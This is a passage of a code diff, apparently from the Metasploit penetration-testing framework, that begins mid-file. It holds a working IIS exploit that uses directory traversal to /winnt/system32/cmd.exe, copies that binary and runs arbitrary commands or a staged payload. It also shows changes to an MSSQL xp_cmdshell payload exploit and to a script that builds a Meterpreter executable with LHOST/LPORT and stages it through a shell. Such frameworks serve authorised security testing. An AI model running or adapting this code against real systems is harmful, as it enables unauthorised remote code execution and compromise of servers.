+			headers = sock.get_once(-1, timeout)
+			body = sock.get_once(-1, timeout)
+		rescue ::EOFError
+			# nothing
+		end
+
+		if (datastore['DEBUG'])
+			print_status("Headers:\n" + headers.inspect)
+			print_status("Body:\n" + body.inspect)
+		end
+		disconnect
+		[headers, body]
+	end
+
+
+	def check
+		res = execute_command("dir")
+		if (res.kind_of?(Array))
+			body = res[1]
+			if (body and body =~ /Directory of /)
+				return Exploit::CheckCode::Vulnerable
+			end
+		end
+
+		Exploit::CheckCode::Safe
+	end
+
+
+	#
+	# NOTE: the command executes regardless of whether or not
+	# a valid response is returned...
+	#
+	def execute_command(cmd, opts = {})
+		uri = '/scripts/'
+		exe = opts[:cgifname]
+		if (not exe)
+			uri << dotdotslash
+			uri << dotdotslash
+			uri << 'winnt/system32/cmd.exe'
+		else
+			uri << exe
+		end
+		uri << '?/x+/c+'
+		uri << Rex::Text.uri_encode(cmd)
+
+		if (datastore['VERBOSE'])
+			print_status("Attemping to execute: #{uri}")
+		end
+
+		mini_http_request({
+				'uri'     => uri,
+				'method'  => 'GET',
+			}, 20)
+	end
+
+
+	def exploit
+
+		# first copy the file
+		exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
+		# NOTE: this assumes %SystemRoot% on the same drive as the web scripst directory
+		res = execute_command("copy \\winnt\\system32\\cmd.exe #{exe_fname}")
+
+		if (datastore['CMD'])
+			res = execute_command(datastore['CMD'], { :cgifname => exe_fname })
+		else
+			execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname })
+		end
+
+		print_status("NOTE: The copied cmd.exe and payload binaries must be deleted manually")
+		# NOTE: We try to delete the copied exe here, although if the payload is running,
+		# we probably can't delete it due to it being in use...
+		execute_command("del #{exe_fname}")
+
+		handler
+		disconnect
+
+	end
+
+end
--- a/modules/exploits/windows/mssql/mssql_payload.rb
+++ b/modules/exploits/windows/mssql/mssql_payload.rb
@ -15,7 +15,10 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking

 	include Msf::Exploit::Remote::MSSQL
-	include Msf::Exploit::CmdStager
+	include Msf::Exploit::CmdStagerVBS
+	#include Msf::Exploit::CmdStagerDebugAsm
+	#include Msf::Exploit::CmdStagerDebugWrite
+	#include Msf::Exploit::CmdStagerTFTP

 	def initialize(info = {})
 		super(update_info(info,
@ -54,36 +57,25 @@ class Metasploit3 < Msf::Exploit::Remote
 			])
 	end

+	# This is method required for the CmdStager to work...
+	def execute_command(cmd, opts)
+		mssql_xpcmdshell(cmd, datastore['VERBOSE'])
+	end
+
 	def exploit

-		debug = datastore['VERBOSE'] # enable to see the output
-
-		if(not mssql_login_datastore)
+		if (not mssql_login_datastore)
 			print_status("Invalid SQL Server credentials")
 			return
 		end

 		# Use the CmdStager or not?
 		if (not datastore['UseCmdStager'])
-			mssql_upload_exec(Msf::Util::EXE.to_win32pe(framework,payload.encoded), debug)
+			exe = generate_exe
+			mssql_upload_exec(exe, datastore['VERBOSE'])
 		else
-			cmd_list = generate_cmdstager({}, 1500)
-			total_bytes = 0
-			cmd_list.each { |cmd| total_bytes += cmd.length }
-
-			sent = 0
-			delay = 0.25
-
-			cmd_list.each { |cmd|
-				mssql_xpcmdshell(cmd, debug)
-				sent += cmd.length
-
-				# so multi threaded servers can place data in files in the correct order
-				select(nil, nil, nil, delay)
-
-				progress(total_bytes, sent)
-			}
-
+			execute_cmdstager({ :linemax => 1500, :nodelete => true })
+			#execute_cmdstager({ :linemax => 1500 })
 		end

 		handler
@ -91,4 +83,3 @@ class Metasploit3 < Msf::Exploit::Remote
 	end

 end
-
--- a/scripts/shell/spawn_meterpreter.rb
+++ b/scripts/shell/spawn_meterpreter.rb
@ -2,7 +2,7 @@
 #
 # Spawn a meterpreter session using an existing command shell session
 #
-# NOTE: Some of the following code is duplicated from lib/msf/core/exploit/cmdstager.rb
+# NOTE: Some of the following code is duplicated from the VBS CmdStager
 #
 # This is really only to prove the concept for now.
 #
@ -34,7 +34,6 @@ payload = framework.payloads.create(payload_name)
 options = 'LHOST='+lhost + ' LPORT='+lport
 buf = payload.generate_simple('OptionStr' => options)

-
 #
 # Spawn the handler if needed
 #
@ -71,26 +70,29 @@ end


 #
-# Setup the command stager
+# Make the payload into an exe for the CmdStager
 #
-los = 'win'
-larch = ARCH_X86
+lplat = [Msf::Platform::Windows]
+larch = [ARCH_X86]
 opts = {
+	:linemax => 1700,
 	#:persist => true
 }
-linelen = 1700
 delay = 0.25
+exe = Msf::Util::EXE.to_executable(framework, larch, lplat, buf)
+

 #
 # Generate the stager command array
 #
-cmdstager = Rex::Exploitation::CmdStager.new(buf, framework, los, larch)
-cmds = cmdstager.generate(opts, linelen)
+cmdstager = Rex::Exploitation::CmdStagerVBS.new(exe)
+cmds = cmdstager.generate(opts)
 if (cmds.nil? or cmds.length < 1)
 	print_error("The command stager could not be generated")
 	raise ArgumentError
 end

+
 #
 # Calculate the total size
 #